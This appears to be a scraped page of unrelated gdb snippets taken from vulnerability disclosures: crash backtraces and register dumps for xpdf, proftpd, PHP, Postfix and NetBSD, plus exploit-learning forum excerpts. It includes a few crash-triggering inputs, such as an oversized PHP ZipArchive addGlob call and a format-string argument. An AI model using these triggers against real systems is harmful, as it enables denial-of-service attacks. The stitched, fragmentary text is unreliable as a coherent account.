Next Page >>
gdb
[root@pi3book xpdf-3.02]# xpdf elo.pdf
Error: PDF file is damaged - attempting to reconstruct xref table...
Naruszenie ochrony pamięci
[root@pi3book xpdf-3.02]#
and gdb output:
(gdb) bt
#0 0x080c222a in SplashOutputDev::imageSrc (data=0xbfffec84, colorLine=0xb7fe46de '�' <repeats 200 times>..., alphaLine=0x0) at SplashOutputDev.cc:1848
#1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 <SplashOutputDev::imageSrc(void*, unsigned char*, unsigned char*)>, srcData=0xbfffec84,
srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532
Segmentation fault
and more like proftpd.
Simple crash for CVE-2010-4051
(gdb) x/i $rip
=> 0x7ffff7ad3ea2: mov %eax,0x50(%rsp)
(gdb) x/i $eax
0x2: Cannot access memory at address 0x2
(gdb) x/i $rsp
0x7fffff5fef90: Cannot access memory at address 0x7fffff5fef90
Step-by-step instructions for debugging IOS using gdb - Andy Davis,
2008 (iosftpexploit "at" googlemail <dot> com):
I have been asked by many people for a simple step-by-step guide for
setting up an IOS exploit development environment, which includes
connecting to a Cisco router using gdb, so here goes:
(By the way the router I connect to is a Cisco 2621XM)
Apparently application server uses an user controled value as "size"
parameter to a "memmove()" function, therefore we have control of
number of bytes being moved. If we use a huge value we can lead
application to overwrite EIP and cause a Denial of Service.
--- GDB OUTPUT BEGIN ---
# gdb -p 12748
Attaching to process 12748
Reading symbols from
/microsiga/protheus10/bin/appserver/totvssrvlinux...(no debugging
symbols found)...done.
This is the debug information about this vulnerability (from Sun Solaris 9 x86).
Breakpoint 1, 0xd330e5b0 in adm_build_path ()
from /usr/snadm/lib/libadmapm.so.2
(gdb) until *adm_build_path+38
0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc
0xd330e5c6 <adm_build_path+38>: call 0xd3304fa8 <strcat@plt>
(gdb) x/x $esp+4
0x80411e4: 0x080b7cd0
to attack server behind other servers... but... everyone knows probably better vectors :)
Proof of concept
[root@pi3-test apache]# gdb -q ./bin/httpd
(gdb) r -X
Starting program: /usr/local/apache/bin/httpd -X
[Sun Dec 27 05:03:19 2009] [alert] httpd: Could not determine the server's fully
qualified domain name, using 127.0.0.1 for ServerName
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
(no debugging symbols found)
331 Password required for dude
pass dude
and in the same time
# gdb -q proftpd 15814
(no debugging symbols found)
Attaching to program: /usr/local/sbin/proftpd, process 15814
Reading symbols from /usr/lib/libutil.so.11.2...done.
Loaded symbols for /usr/lib/libutil.so.11.2
Reading symbols from /usr/lib/libc.so.58.0...done.
n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=== CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED
for (i=0; i<n; i++) {
..
-zip_name_locate.c-------------------------------------
(gdb) bt
#0 0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70 "a", flags=32767,
error=0xffffffff00000000) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
#1 0x00000000006381e6 in c_ziparchive_locateName (ht=2, return_value=0x1169418, return_value_ptr=0xffffffff,
this_ptr=0x118d530, return_value_used=-176126592) at /build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877
#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7eb7068)
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000001007ca000
[Switching to process 2342]
0x00007fffffe00847 in __memcpy ()
(gdb) i r
rax 0xffffffffeb790000 -344391680
rbx 0x10078c000 4302880768
rcx 0xfffffffffff3e000 -794624
rdx 0x0 0
rsi 0x1150fc000 4648321024
database server with a large XDR-encoded ASCII string as its argument.
Breakpoint 1, 0xd37b2200 in _tt_internal_realpath () from
/usr/lib/libtt.a(shr.o)
(gdb) where
#0 0xd37b2200 in _tt_internal_realpath () from /usr/lib/libtt.a(shr.o)
#1 0xd37af9f0 in _tt_get_realpath__FPcT1 () from /usr/lib/libtt.a(shr.o)
#2 0xd37b00b4 in _tt_realpath () from /usr/lib/libtt.a(shr.o)
#3 0xd37b287c in _Tt_file_system::bestMatchToPath () from
/usr/lib/libtt.a(shr.o)
Scan engine v5.1.00 for Linux.
Virus data file v4777 created Jun 05 2006
Scanning for 194376 viruses, trojans and variants.
# gdb /usr/local/uvscan/uvscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions. There is
> I'm beggining studying deeply exploits. Now I have a problem. I'm
> trying a return-to-libc exploit but I get a segmentation fault when
> executed in the terminal and I get the code correctly executed when I
> run it inside GDB. Does GDB alter the memory map of a process when
> executed inside it? In which way? Where I can read info about this?
It's hard to say exactly what's going on without seeing the example
code you're trying to exploit. But let me give you some basic
thoughts..
give NULL pointer dereference here.
Changing length of first parameter of grapheme_extract(), we will also change rip in memcpy(3).
(gdb) r -r 'grapheme_extract('a',-1);'
..
(gdb) x/i $rip
=> 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70
Mar 25 05:34:40 /netbsd: panic: trap
Mar 25 05:34:40 /netbsd: Faulted in mid-traceback; aborting...
Adjust depth as required.
(gdb) bt
#0 ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:112
#1 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
#2 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
#3 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
#4 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));
Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c <memset+44>: rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0: Cannot access memory at address 0x0
(gdb) x/x $edi
0x0: Cannot access memory at address 0x0
Updated versions of all supported hosted products and all ESX 2x
products and patches for ESX 30x address critical security updates.
Service Console security updates for samba, bind, krb5, vixie-cron,
shadow-utils, openldap, pam, gcc, and gdb packages.
2. Relevant releases:
VMware Workstation 6.0.0
VMware Player 2.0.0
in result
# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
Hi,
I'm beggining studying deeply exploits. Now I have a problem. I'm
trying a return-to-libc exploit but I get a segmentation fault when
executed in the terminal and I get the code correctly executed when I
run it inside GDB. Does GDB alter the memory map of a process when
executed inside it? In which way? Where I can read info about this?
This is the problem:
fcano@gohan ~/ShellcodersHandbook/code/ch02 $ ./ret2libc 609 1776
Using address: 0xbfffeb08
---bsd/netbsd---
unlink("empty.zip"); fopen("empty.zip","a"); $nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("A",1000000),0x39);
Program received signal SIGSEGV, Segmentation fault.
0xbb86bb12 in realloc () from /usr/lib/libc.so.12
(gdb) i r
eax 0x410041 4259905
ecx 0xc 12
edx 0xbfb00000 -1078984704
ebx 0xbb8c81f4 -1148419596
esp 0xbfbfa980 0xbfbfa980
printf("grams = %lf\n", weed);
return 0;
}
(gdb) r
Starting program: /Volumes/ARC/299
Reading symbols for shared libraries ++. done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
*) Maybe others?
Ok let’s analyse Adobe Acrobat vuln in version 9.1.1:
# gdb –pid=<smth>
…
…
eax=6167343A ebx=5959595A ecx=6167343C edx=04A96F89 esi=6E6C0055
edi=59595957
ebp=6E6C006C esp=0022E51B program=C:\sshd\bin\scp.exe
cs=001B ds=0023 es=0023 fs=0038 gs=0000 ss=0023
$ gdb /usr/bin/touch.exe
GNU gdb 2003-09-20-cvs (cygwin-special)
...
(gdb) r AAAA ...
Program received signal SIGSEGV, Segmentation fault.
0x61091eea in getppid () from /usr/bin/cygwin1.dll
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
What is wrong? Let's see
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
and me in my initial disclosure [4] were using a patched PHP (for example
Suhosin, both loaded as .so or "build-in", Ubuntu PHP, that is patched
with Suhosin, etc).
This is thanks to a deep and extensive testing and observation plus some
code navigation and gdb magery with the help of evilaliv3 and Wisec.
To overcome this limitation we came out with the universal path
normalization vector for PHP that is not a single "/" but "/.". Well
this is the case in which a single char really changes things.
0x28132f4f <__vfprintf+9727>: repnz scas %es:(%edi),%al
This is caused by the following call in the elfdump.c file:
fprintf(out, "\te_ident: %s %s %s\n", ei_classes[class], ei_data[data],
ei_abis[osabi]);
[Dreg@ ~/vuln]# gdb --core elfdump.core
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 248 64 c0084edc 0000ae2c S /init
root 2 0 0 0 c0049168 00000000 S kthreadd
...
root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb
app_0 1574 535 83564 12832 ffffffff afe0c79c S
com.google.android.browser
root 1600 587 840 324 00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
) = 318
fflush(0x40187860) = 0
strcpy(0x81f0660, "\\[x4141414141414109].\\[x41414141"...) = 0x81f0660
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@lost-coder mtr-0.72]# gdb -q ./mtr core
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Postfix SMTP server process crashes in "step 2" of the DIGEST-MD5
authentication protocol. This happens while attempting to read from
a pointer that contains an invalid address.
In this particular example, the Postfix SMTP server crashes while
running under control of the GDB debugger (see the Postfix master(5)
manpage discussion of the -D option), while processing the SMTP
commands shown in the example above.
(gdb) where
#0 0x884bbedf in clear_reauth_entry (reauth=0x206e6f69, type=SERVER,
0xdee860f <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3779>: cmp 0x8(%eax),%ecx
0xdee8612 <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3782>: jae 0xdee861a <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3790>
0xdee8614 <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3784>: mov 0xc(%eax),%eax
0xdee8617 <_ZN11JBIG2Stream17readSymbolDictSegEjjPjj+3787>: mov %esi,(%eax,%edi,1) <----- Crash
(gdb) i r $esi $eax $edi
esi 0xc79e860 209315936
eax 0x0 0
edi 0x0 0
(gdb) bt
Next Page>>
|
